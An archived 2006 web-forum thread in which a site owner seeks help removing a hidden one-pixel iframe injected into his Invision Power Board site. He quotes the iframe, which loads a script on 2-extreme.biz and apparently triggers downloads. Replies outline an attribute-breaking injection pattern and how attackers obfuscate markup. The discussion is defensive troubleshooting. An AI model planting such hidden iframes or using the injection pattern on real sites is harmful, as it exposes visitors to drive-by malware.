SitePoint Sponsor

User Tag List

Results 1 to 22 of 22
  1. #1
    SitePoint Member websitedealer's Avatar
    Join Date
    Oct 2005
    Posts
    0
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Remove iframe (was Help!)

    Hi guys,

    I need help with the site www.iflimits.com

    when you load it.. there is a url that shows at the bottom of the explorer page. http://2-extreme.biz and my IE gets stuck a bit.

    I believe this is where the problem is:

    \\

    </div>
    <iframe src="http://2-extreme.biz/traff.php?adv=54" width=1 height=1></iframe>
    </body>

    </html>//


    Where do i find this code and how do i remove it? I mean i looked it up at index.php and other php files and it was not there. need help

    Mike
    Last edited by websitedealer; May 13, 2006 at 17:34.

  2. #2
    Sell crazy someplace else markl999's Avatar
    Join Date
    Aug 2003
    Location
    Manchester, UK
    Posts
    4,007
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    It sounds to me like you've been 'infected' with the browser hijacker known as CWS (CoolWebSearch). Coolwebsearch are producing a growing strain of trojans that exploit a hole in the Microsoft Java VM, and change your homepage amongst other things. One of the know annoyances is that the trojan can insert iframes into your code that redirect you to some rather dubious sites, 2-extreme has been listed as one of them.
    So I'd Uninstalling the MS Java VM and have a general clean up using something like HijackThis .. but CWS is an absolute nightmare to get rid of .. apparently. Best of luck.

    Course, it might not be CWS at all, just some stray code, but it sounds dodgy to me

  3. #3
    SitePoint Member websitedealer's Avatar
    Join Date
    Oct 2005
    Posts
    0
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I appreciate your input! I will give it a try.

    Anyone else who knows anything abt solving this problem?

  4. #4
    SitePoint Wizard Pedro Monteiro's Avatar
    Join Date
    Sep 2002
    Location
    Lisbon
    Posts
    1,393
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    It literally crashed my system when opening the page with IE. Once I opened the page it just triggered a download.

    Are you in a Free hosted account?

  5. #5
    SitePoint Member websitedealer's Avatar
    Join Date
    Oct 2005
    Posts
    0
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    anyone else?

  6. #6
    SitePoint Member websitedealer's Avatar
    Join Date
    Oct 2005
    Posts
    0
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Pedro, no I have it hosted for $.

    When I visit the site.. my IE goes slow for min and then gets back to normal. It shows the .biz url I meantioned. you have any idea how i can remove or know anyone who can help me?

    Really appreciate your time!

  7. #7
    SitePoint Member websitedealer's Avatar
    Join Date
    Oct 2005
    Posts
    0
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Guys, i just found out that you can visit www.iflimits.com and click on stop (red X) and nothing will happen!

  8. #8
    SitePoint Wizard Pedro Monteiro's Avatar
    Join Date
    Sep 2002
    Location
    Lisbon
    Posts
    1,393
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    It just stops the Iframe from loading the link. But it's still there.

  9. #9
    Programming Team silver trophybronze trophy
    Mittineague's Avatar
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,290
    Mentioned
    198 Post(s)
    Tagged
    3 Thread(s)

    board hacked

    Popular open source apps can be studied by script kiddies. Do a for - "Invision Power Board" 2.1.3 security - and you can find sites that detail the apps security flaws.
    It looks like a p tag with the iframe in it is getting there from a appendChild script. The page has 7 external javascript files.
    <script type="text/javascript" src='jscripts/ipb_global.js'></script>
    <script type="text/javascript" src='jscripts/ips_menu.js'></script>
    <script type="text/javascript" src='style_images/1/folder_js_skin/ips_menu_html.js'></script>
    <script type="text/javascript" src='jscripts/ips_xmlhttprequest.js'></script>
    <script type="text/javascript" src='jscripts/ipb_global_xmlenhanced.js'></script>
    <script type="text/javascript" src='jscripts/dom-drag.js'></script>
    <script type="text/javascript" src="jscripts/ipb_board.js"></script>
    The first place I would look is in those files for an "appendChild" that creates the p/iframe and delete it (or at least comment out that portion of the code if it's there until you're sure that's what was doing it).
    If you don't find anything in those, check out the apps database tables for code that may have been inserted via unscrubbed input. ie.
    Style input, type text, expecting "Arial", where the app would create
    <font family="Arial">
    But if someone entered - "><iframe ......
    the app would create
    <font family="><iframe .....
    Hope this helps in your quest to fix it.

  10. #10
    SitePoint Wizard gold trophysilver trophybronze trophy dc dalton's Avatar
    Join Date
    Nov 2004
    Location
    Right behind you, watching, always watching.
    Posts
    5,431
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    What in heavens name has this to do woth JAVA????????

    Folks PAY ATTENTION to the sections before posting!

  11. #11
    Programming Team silver trophybronze trophy
    Mittineague's Avatar
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,290
    Mentioned
    198 Post(s)
    Tagged
    3 Thread(s)
    Quote Originally Posted by dc dalton
    What in heavens name has this to do woth JAVA?
    Not much as far as I can tell. I sent a move request in.

    I forgot to mention that script kiddies like to think they're clever and often write obfuscated code. You may see something that looks like an array of numbers and maybe a charCodeAt() instead of the mark-up characters. ie.
    <iframe would be 60,105,102,114,97,109,101
    Or it could be in hex (x3c), octal(074), entities(&#60), or encoded(%3c), too I suppose. Basically if you see something that's not clear, ie. function named "c" or the like, look closer.
    Look close at any write() function.

    EDIT:
    I just looked at the javascript files, and although there is an iframe append, it isn't in a p tag, so I don't think that's the problem. Check the database tables.
    Last edited by Mittineague; May 13, 2006 at 23:06.

  12. #12
    SitePoint Member websitedealer's Avatar
    Join Date
    Oct 2005
    Posts
    0
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Still looking for solution..

  13. #13
    SitePoint Member websitedealer's Avatar
    Join Date
    Oct 2005
    Posts
    0
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thanks a lot Thomas! I will try that.

    I guess there a bits of java stuff involved so I thought it would be relevant. I am sorry If i posted in the wrong section.

  14. #14
    SitePoint Member websitedealer's Avatar
    Join Date
    Oct 2005
    Posts
    0
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thomas, this is what i found in ips_menu.js

    //----------------------------------
    // Workaround for IE bug which shows
    // select boxes and other windows GUI
    // over divs. SHOW IFRAME
    //----------------------------------

    if ( is_ie )
    {
    try
    {
    if ( ! document.getElementById( 'if_' + e.id ) )
    {
    var iframeobj = document.createElement('iframe');

    iframeobj.src = 'javascript:;';
    iframeobj.id = 'if_' + e.id;

    document.getElementsByTagName('body').appendChild( iframeobj );
    }
    else
    {
    var iframeobj = document.getElementById( 'if_' + e.id );
    }

    iframeobj.scrolling = 'no';
    iframeobj.frameborder = 'no';
    iframeobj.className = 'iframeshim';
    iframeobj.style.position = 'absolute';

    iframeobj.style.width = parseInt(mobj.offsetWidth) + 'px';
    iframeobj.style.height = parseInt(mobj.offsetHeight) + 'px';
    iframeobj.style.top = mobj.style.top;
    iframeobj.style.left = mobj.style.left;
    iframeobj.style.zIndex = 99;
    iframeobj.style.display = "block";

    }
    catch(e)
    {
    //alert(e); // Oh dear, someones stolen the iframe
    }
    }

    //----------------------------------
    // Work around for safari which doesnt
    // allow a hrefs top be clickable in
    // a pop up div
    //----------------------------------




    Which part should i delete from here? just the term "appendchild" or the the whole thing above..?


    Thanks!!!

  15. #15
    SitePoint Member websitedealer's Avatar
    Join Date
    Oct 2005
    Posts
    0
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I tried deleting part of it.. and save the file and it somehow shows up again.

    I then delete the whole section (above) and save the file... it again popped up! Any special way to delete it?

  16. #16
    SitePoint Wizard silver trophy
    Join Date
    Mar 2006
    Posts
    6,132
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    if this is your website, and you didnt add that code, then to me it sounds like there is a bug in invision that allowed someone to insert some code.

    consult thier forums. this is a problem with thier application, not php.

  17. #17
    Programming Team silver trophybronze trophy
    Mittineague's Avatar
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,290
    Mentioned
    198 Post(s)
    Tagged
    3 Thread(s)

    append

    Quote Originally Posted by mittineague
    I just looked at the javascript files, and although there is an iframe append, it isn't in a p tag, so I don't think that's the problem. Check the database tables.
    Don't delete it. Replace the file with the original. And please check your board's database files. Especially any dealing with the style configuration. I think what happened may have been something like
    Quote Originally Posted by mittineague
    ... code that may have been inserted via unscrubbed input. ie.
    Style input, type text, expecting "Arial", where the app would create
    <font family="Arial">
    But if someone entered - "><iframe ......
    the app would create
    <font family="><iframe .....

  18. #18
    SitePoint Wizard gold trophysilver trophybronze trophy dc dalton's Avatar
    Join Date
    Nov 2004
    Location
    Right behind you, watching, always watching.
    Posts
    5,431
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by websitedealer
    Thanks a lot Thomas! I will try that.

    I guess there a bits of java stuff involved so I thought it would be relevant. I am sorry If i posted in the wrong section.
    You need to learn the difference between java and Javascript ..... they are NOT the same thing, not even close!

  19. #19
    Mlle. Ledoyen silver trophy seanf's Avatar
    Join Date
    Jan 2001
    Location
    UK
    Posts
    7,168
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Threads merged and moved, triplicate removed and title altered. Please think more carefully when posting

    Sean
    Harry Potter

    -- You lived inside my world so softly
    -- Protected only by the kindness of your nature

  20. #20
    SitePoint Member websitedealer's Avatar
    Join Date
    Oct 2005
    Posts
    0
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Its going out of my head. LoL. Where would i find the original code to replace it with the one i mentioned above? I basically buy and sell websites and unfortunately dont have much technical knowledge...

    Could you do this for me? I would really appreciate that and you owe you one. If you need anything in return, I would be happy to provide as a thank you

    Mike


    Quote Originally Posted by Mittineague
    Don't delete it. Replace the file with the original. And please check your board's database files. Especially any dealing with the style configuration. I think what happened may have been something like

  21. #21
    Programming Team silver trophybronze trophy
    Mittineague's Avatar
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,290
    Mentioned
    198 Post(s)
    Tagged
    3 Thread(s)

    js file

    Sorry if I worded my earlir post a bit unclearly.
    Quote Originally Posted by mittineague
    look is in those files for an "appendChild" that creates the p/iframe and delete it (or at least comment out that portion of the code if it's there until you're sure that's what was doing it).
    I should have said "comment it out, and see if it fixes things then delete it. I was assuming (yes, I know) that you would see BOTH a p tag (which the code doesn't have) and the code that writes the - not an - iframe. An important lesson, NEVER DELETE ANYTHING WITHOUT SAVING A BACKUP COPY. Hopefully you can copy what you posted above back into the file. If not you will have to try to remermber the code you took out. or contact IVB for a new file, tell them the file is corrupt and you need a new one.

  22. #22
    SitePoint Member
    Join Date
    Sep 2008
    Posts
    6
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    oh i came late here on this post so its okay.


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •